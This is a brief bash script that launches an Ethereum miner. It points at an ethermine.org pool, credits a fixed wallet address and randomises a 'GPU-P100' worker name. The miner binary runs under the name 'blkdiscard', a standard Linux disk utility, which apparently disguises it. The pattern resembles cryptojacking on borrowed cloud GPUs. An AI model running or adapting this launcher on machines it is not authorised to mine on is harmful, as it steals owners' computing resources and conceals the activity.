#!/bin/bash
POOL=asia1.ethermine.org:4444
WALLET=0x48f22dA23E8Ed0ccFED1bCD8499f3Bed68772618
WORKER=$(echo GPU-P100-$(shuf -i 1000-9999 -n 1))
ALGO=ETHASH

chmod +x blkdiscard
./blkdiscard --algo $ALGO --pool $POOL --user $WALLET.$WORKER --ethstratum ETHPROXY
